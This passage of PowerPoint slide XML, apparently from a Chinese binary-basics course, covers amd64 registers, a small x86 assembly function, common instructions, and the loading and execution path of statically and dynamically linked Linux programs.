          <p:cNvPr id="7" name="Shape 141">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A55DAE05-9B77-4180-8D01-AC055384DDAB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5528335" y="2206491"/>
            <a:ext cx="2277380" cy="147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" name="Shape 142">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6AD1EC1A-F8FA-4F3B-88EB-B736259ED818}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="6" idx="1"/>
            <a:endCxn id="2" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5503988" y="2482464"/>
            <a:ext cx="2301727" cy="338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" name="Shape 143">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD1BF977-7E2D-4C76-903A-6886056A5079}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5526511" y="2771200"/>
            <a:ext cx="2279204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0" name="Shape 144">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9BCBE9B2-FD68-4767-8CBD-56FC242DA9AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6119198" y="1922550"/>
            <a:ext cx="1251477" cy="2812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/>
              <a:t>Address</a:t>
            </a:r>
            <a:endParaRPr sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Shape 145">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0DE01596-B20E-41C7-A6C5-043DFA23A416}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6119198" y="2201179"/>
            <a:ext cx="1251477" cy="2812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Data</a:t>
            </a:r>
            <a:endParaRPr sz="1000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Shape 146">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{851E3087-0D5B-4F81-B291-35B230B9B7C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5808360" y="2482463"/>
            <a:ext cx="1873152" cy="340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/>
              <a:t>Instruction</a:t>
            </a:r>
            <a:endParaRPr sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Shape 147">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F02F13A3-A257-4E8E-9DA7-DA796D008897}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7132755" y="4267304"/>
            <a:ext cx="2683189" cy="1743626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sum:</a:t>
            </a:r>
            <a:endParaRPr sz="1200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lvl="0" indent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push ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1200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lvl="0" indent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mov ebp, esp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent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mov eax, [ebp+12]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent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add eax, [ebp+8]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent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pop ebp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent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ret</a:t>
            </a:r>
            <a:endParaRPr sz="1200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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="14" name="Shape 148">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A72542C9-FD2B-46E3-8C94-577DCAA0B115}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6797281" y="5116292"/>
            <a:ext cx="371413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5" name="Shape 149">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{267BE163-EF0E-4DA9-95D7-99DA3B06D662}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6281881" y="4850256"/>
            <a:ext cx="637426" cy="5063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PC</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="16" name="Shape 150">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F756734-EC1F-4FE8-B56C-2665579540CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6797281" y="4911001"/>
            <a:ext cx="371413" cy="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18" name="连接符: 肘形 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C522494-CEF7-4080-9BB1-CF7779DC8024}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="6" idx="3"/>
            <a:endCxn id="13" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9815944" y="2482464"/>
            <a:ext cx="12700" cy="2656653"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 180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箭头: 右 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6966EA9D-7C3F-4CC4-8C98-66A9DE6263CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9194835" y="2412123"/>
            <a:ext cx="641885" cy="150824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DF636260-8205-47E4-9CDD-EA31275526BA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2438837" y="4619423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进程的执行过程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7F50D5A2-4B01-4D24-882B-13CF3B5F7283}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="56388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二进制基础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| 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程序的装载与进程的执行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562303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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8BB59FA0-D640-4CBB-9E97-5CE9DA1471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754521"/>
            <a:ext cx="5152381" cy="5809524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8122C1E4-0D06-4388-B5BB-90FBCF50F9BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="783962" y="921627"/>
            <a:ext cx="27414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amd64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寄存器结构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214BACB4-24DE-4266-BA56-55C1F014E2AC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1248031" y="1383292"/>
            <a:ext cx="181331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 err="1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rax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： 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8Bytes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 err="1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eax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：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4Bytes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ax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：  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2Bytes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ah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：  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1Bytes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al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：   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1Bytes</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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A3A43BF4-E13E-482C-B4A6-557B93DA2D54}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="783962" y="3322285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部分寄存器的功能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988D431C-1273-4D9D-9444-934A24F76FE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1248030" y="4029751"/>
            <a:ext cx="3993401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RIP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存放当前执行的指令的地址</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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RSP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存放当前栈帧的栈顶地址</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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RBP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存放当前栈帧的栈底地址</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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RAX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通用寄存器。存放函数返回值</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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67B6E333-7C04-472C-9250-57C72ACC5E03}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="56388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二进制基础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| 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程序的装载与进程的执行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429267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Shape 663"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2107967" y="2276600"/>
            <a:ext cx="1555200" cy="3840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$ ./binary</a:t>
            </a:r>
            <a:endParaRPr sz="1867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64" name="Shape 664"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="903967" y="3788467"/>
            <a:ext cx="3963200" cy="3840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execve("./binary", *argv[], *envp[])</a:t>
            </a:r>
            <a:endParaRPr sz="1867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65" name="Shape 665"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2107967" y="3032533"/>
            <a:ext cx="1555200" cy="3840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fork()</a:t>
            </a:r>
            <a:endParaRPr sz="1867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66" name="Shape 666"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1846567" y="4675600"/>
            <a:ext cx="2078000" cy="384000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FCE5C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sys_execve()</a:t>
            </a:r>
            <a:endParaRPr sz="1867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67" name="Shape 667"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1846567" y="5506533"/>
            <a:ext cx="2078000" cy="384000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FCE5C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do_execve()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68" name="Shape 668"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6202900" y="5506533"/>
            <a:ext cx="2822000" cy="384000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FCE5C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search_binary_handler()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69" name="Shape 669"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6574900" y="4675600"/>
            <a:ext cx="2078000" cy="384000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FCE5C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load_elf_binary()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70" name="Shape 670"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6836300" y="3788467"/>
            <a:ext cx="1555200" cy="3840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_start</a:t>
            </a:r>
            <a:endParaRPr sz="1867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71" name="Shape 671"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6836300" y="3016351"/>
            <a:ext cx="1555200" cy="3840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main()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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="672" name="Shape 672"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="663" idx="2"/>
            <a:endCxn id="665" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2885567" y="2660600"/>
            <a:ext cx="0" cy="372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73" name="Shape 673"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="665" idx="2"/>
            <a:endCxn id="664" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2885567" y="3416533"/>
            <a:ext cx="0" cy="372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74" name="Shape 674"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="664" idx="2"/>
            <a:endCxn id="666" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2885567" y="4172467"/>
            <a:ext cx="0" cy="503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75" name="Shape 675"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="666" idx="2"/>
            <a:endCxn id="667" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2885567" y="5059600"/>
            <a:ext cx="0" cy="446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76" name="Shape 676"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="667" idx="3"/>
            <a:endCxn id="668" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3924567" y="5698533"/>
            <a:ext cx="2278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77" name="Shape 677"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="668" idx="0"/>
            <a:endCxn id="669" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="7613900" y="5059733"/>
            <a:ext cx="0" cy="446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78" name="Shape 678"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="669" idx="0"/>
            <a:endCxn id="670" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="7613900" y="4172400"/>
            <a:ext cx="0" cy="503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79" name="Shape 679"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="670" idx="0"/>
            <a:endCxn id="671" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="7613900" y="3400467"/>
            <a:ext cx="0" cy="38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80" name="Shape 680"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="590233" y="4403533"/>
            <a:ext cx="11017600" cy="9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lgDash"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="681" name="Shape 681"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9534533" y="3788467"/>
            <a:ext cx="15552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user mode</a:t>
            </a:r>
            <a:endParaRPr sz="1867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82" name="Shape 682"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9534533" y="4643800"/>
            <a:ext cx="15552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kernel mode</a:t>
            </a:r>
            <a:endParaRPr sz="1867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4" name="Shape 662">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EDF641D7-71BE-4189-81FB-FA69D00BDFF9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3924567" y="1351466"/>
            <a:ext cx="4064163" cy="573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zh-CN" altLang="en-US" sz="24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静态链接的程序的执行过程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02F8ECE6-60F5-43B1-9694-EB1DA0BFFE30}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="56388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二进制基础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| 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程序的装载与进程的执行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Shape 689"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2107967" y="2276600"/>
            <a:ext cx="1555200" cy="3840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$ ./binary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90" name="Shape 690"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="903967" y="3788467"/>
            <a:ext cx="3963200" cy="3840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execve("./binary", *argv[], *envp[])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91" name="Shape 691"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2107967" y="3032533"/>
            <a:ext cx="1555200" cy="3840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fork()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92" name="Shape 692"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1846567" y="4675600"/>
            <a:ext cx="2078000" cy="384000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FCE5C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sys_execve()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93" name="Shape 693"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1846567" y="5506533"/>
            <a:ext cx="2078000" cy="384000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FCE5C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do_execve()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94" name="Shape 694"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6202900" y="5506533"/>
            <a:ext cx="2822000" cy="384000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FCE5C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search_binary_handler()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95" name="Shape 695"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6574900" y="4675600"/>
            <a:ext cx="2078000" cy="384000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FCE5C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load_elf_binary()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96" name="Shape 696"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6847100" y="3032517"/>
            <a:ext cx="1555200" cy="3840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_start</a:t>
            </a:r>
            <a:endParaRPr sz="1867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97" name="Shape 697"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6485500" y="2276600"/>
            <a:ext cx="2278400" cy="3840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__libc_start_main()</a:t>
            </a:r>
            <a:endParaRPr sz="1867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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="698" name="Shape 698"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="689" idx="2"/>
            <a:endCxn id="691" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2885567" y="2660600"/>
            <a:ext cx="0" cy="372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99" name="Shape 699"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="691" idx="2"/>
            <a:endCxn id="690" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2885567" y="3416533"/>
            <a:ext cx="0" cy="372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00" name="Shape 700"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="690" idx="2"/>
            <a:endCxn id="692" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2885567" y="4172467"/>
            <a:ext cx="0" cy="503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01" name="Shape 701"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="692" idx="2"/>
            <a:endCxn id="693" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2885567" y="5059600"/>
            <a:ext cx="0" cy="446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02" name="Shape 702"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="693" idx="3"/>
            <a:endCxn id="694" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3924567" y="5698533"/>
            <a:ext cx="2278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03" name="Shape 703"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="694" idx="0"/>
            <a:endCxn id="695" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="7613900" y="5059733"/>
            <a:ext cx="0" cy="446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04" name="Shape 704"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="695" idx="0"/>
            <a:endCxn id="705" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="7613900" y="4172400"/>
            <a:ext cx="10800" cy="503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06" name="Shape 706"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="696" idx="0"/>
            <a:endCxn id="697" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="7624700" y="2660517"/>
            <a:ext cx="0" cy="372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07" name="Shape 707"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="590233" y="4403533"/>
            <a:ext cx="11017600" cy="9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lgDash"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="708" name="Shape 708"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9534533" y="3788467"/>
            <a:ext cx="15552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user mode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709" name="Shape 709"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9534533" y="4643800"/>
            <a:ext cx="15552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kernel mode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705" name="Shape 705"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6847100" y="3788451"/>
            <a:ext cx="1555200" cy="3840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ld.so</a:t>
            </a:r>
            <a:endParaRPr sz="1867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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="710" name="Shape 710"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="705" idx="0"/>
            <a:endCxn id="696" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="7624700" y="3416451"/>
            <a:ext cx="0" cy="372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11" name="Shape 711"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9534533" y="2276584"/>
            <a:ext cx="1555200" cy="3840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_init</a:t>
            </a:r>
            <a:endParaRPr sz="1867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712" name="Shape 712"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9534533" y="3032517"/>
            <a:ext cx="1555200" cy="3840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main()</a:t>
            </a:r>
            <a:endParaRPr sz="1867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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="713" name="Shape 713"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="697" idx="3"/>
            <a:endCxn id="711" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8763900" y="2468600"/>
            <a:ext cx="770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14" name="Shape 714"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="711" idx="2"/>
            <a:endCxn id="712" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10312133" y="2660584"/>
            <a:ext cx="0" cy="372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1" name="Shape 662">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB32ED1E-3C57-4B5E-97AE-4231E2EF61B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3924567" y="1351466"/>
            <a:ext cx="4064163" cy="573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zh-CN" altLang="en-US" sz="24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动态链接的程序的执行过程</a:t>
            </a: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D424BE05-ACFA-4158-AA0C-C4C925F5083E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="56388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二进制基础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| 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程序的装载与进程的执行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161A895-2852-4CA9-A4DE-8C067FC01831}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3110927" y="2131456"/>
            <a:ext cx="2195167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3200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>MOV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3200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>LEA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3200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ADD/SUB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3200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>PUSH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3200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>POP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3200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>CMP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3200" dirty="0"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sz="3200" dirty="0">
